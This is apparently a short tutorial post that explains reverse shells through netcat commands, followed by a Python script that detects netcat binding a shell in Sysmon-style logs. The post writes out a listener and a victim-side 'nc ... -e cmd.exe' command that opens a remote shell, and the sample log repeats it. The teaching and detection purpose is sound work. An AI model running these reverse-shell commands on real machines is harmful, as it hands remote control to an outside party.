A reverse shell is a connection that originates from the victim machine and goes out to the attacker's machine, typically as the result of a malware infection or the exploitation of a vulnerability. Because the victim initiates the outbound connection, it often passes through firewalls that only filter inbound traffic.
But you can get a glimpse of how a reverse shell works without exploiting or infecting anything, using a simple netcat command. Here is how it works.
First, run the following command on the remote (attacker) machine. The -l option puts netcat into listening mode, and -p sets the port it listens on.
nc -l -p <port to listen on>
Then run this command on the victim machine. The -e option (available only in netcat builds compiled with it) starts a cmd.exe instance and binds its standard input and output to the netcat socket, which then connects out to the remote machine.
nc <remote ip> <remote port> -e cmd.exe
Et voilà. You get a remote shell: commands typed on the listening end are executed on the victim, and the output comes back over the same connection.
More or less, malware and exploits do something similar, but in a stealthier way. I hope this helps beginners understand how a reverse shell works.
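From the defender's side, the two commands above leave a distinctive trace in process-creation telemetry: a netcat binary launched with -e/-c pointing at a shell, and a shell whose parent process is netcat. The following script is an added example, not part of the original post; it scans constructed, Sysmon-style key=value log lines (the field names Image, ParentImage and CommandLine are assumptions about the log format) and flags both patterns.

```python
import re

# Process names to treat as netcat variants and as interactive shells.
NETCAT = {"nc", "nc.exe", "nc64.exe", "ncat", "ncat.exe", "netcat"}
SHELLS = {"cmd.exe", "powershell.exe", "sh", "bash", "dash", "zsh"}

def basename(path):
    """Last path component, lower-cased; handles both / and \\ separators."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def parse_event(line):
    """Parse Key=value and Key="quoted value" pairs into a dict."""
    pairs = re.findall(r'(\w+)=(?:"([^"]*)"|(\S+))', line)
    return {key: (quoted if quoted else bare) for key, quoted, bare in pairs}

def classify(event):
    """Return a reason string if the event looks like a netcat reverse shell, else None."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    argv = event.get("CommandLine", "").split()
    if image in NETCAT:
        # nc ... -e cmd.exe / ncat ... -c /bin/bash: a shell bound to the socket
        for i, tok in enumerate(argv[:-1]):
            if tok in ("-e", "-c") and basename(argv[i + 1]) in SHELLS:
                return "netcat -e/-c binding a shell to its socket"
    if image in SHELLS and parent in NETCAT:
        # The shell that -e spawns shows up as a child of the netcat process.
        return "shell spawned as a child of netcat"
    return None

def scan(log_text):
    """Return (line number, reason) for every suspicious event in the log."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), 1):
        if line.strip():
            reason = classify(parse_event(line))
            if reason:
                findings.append((number, reason))
    return findings

# Constructed sample log: one benign cmd.exe, the reverse-shell launch from the
# post, the child shell it creates, and a benign netcat port check.
SAMPLE_LOG = """\
EventID=1 Image="C:\\Windows\\System32\\cmd.exe" ParentImage="C:\\Windows\\explorer.exe" CommandLine="cmd.exe /c dir"
EventID=1 Image="C:\\Tools\\nc.exe" ParentImage="C:\\Windows\\System32\\cmd.exe" CommandLine="nc.exe 203.0.113.5 4444 -e cmd.exe"
EventID=1 Image="C:\\Windows\\System32\\cmd.exe" ParentImage="C:\\Tools\\nc.exe" CommandLine="cmd.exe"
EventID=1 Image="C:\\Tools\\nc.exe" ParentImage="C:\\Windows\\System32\\cmd.exe" CommandLine="nc.exe -zv 10.0.0.7 80"
"""

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

Only lines 2 and 3 of the sample are flagged; the plain port check on line 4 is not, because nothing binds a shell to the socket.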